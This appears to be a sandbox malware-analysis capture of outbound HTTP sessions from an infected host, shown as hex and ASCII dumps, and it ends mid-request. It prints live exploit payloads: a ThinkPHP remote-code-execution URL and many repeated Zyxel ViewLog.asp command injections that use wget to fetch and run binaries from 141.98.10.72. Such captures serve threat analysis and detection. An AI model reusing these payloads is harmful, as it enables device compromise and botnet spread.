                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;248e2117&#46;1707899373&#46;2c17f865</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      285192.168.2.155927088.218.158.21380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:33.853105068 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:34.068268061 CET516INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Sun, 11 Aug 2019 04:08:55 GMT
                                                      Server: lighttpd/1.4.39
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                      Feb 14, 2024 09:29:34.261440039 CET516INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Sun, 11 Aug 2019 04:08:55 GMT
                                                      Server: lighttpd/1.4.39
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      286192.168.2.155357631.136.87.188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.228141069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:34.842009068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:36.089967966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:38.585901976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:43.705722094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:53.689477921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.680854082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:55.639935017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      287192.168.2.154638431.136.61.1978080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.228260040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:34.841996908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:36.089975119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:38.585884094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:43.705727100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:53.689542055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.680900097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:55.639808893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      288192.168.2.153886485.50.210.2068080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.232999086 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:34.477020979 CET75INHTTP/1.1 400 Bad Request
                                                      Server: Rumpus
                                                      Content-length: 0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      289192.168.2.154774231.50.1.1318080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.236304045 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      290192.168.2.154583495.169.88.1798080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.247324944 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:34.507988930 CET349INHTTP/1.1 500 Internal Server Error
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 130
                                                      Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      291192.168.2.155521431.136.218.18080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:34.247469902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:34.938069105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:36.282071114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.097970009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:44.473834991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:55.225553989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:16.728761911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
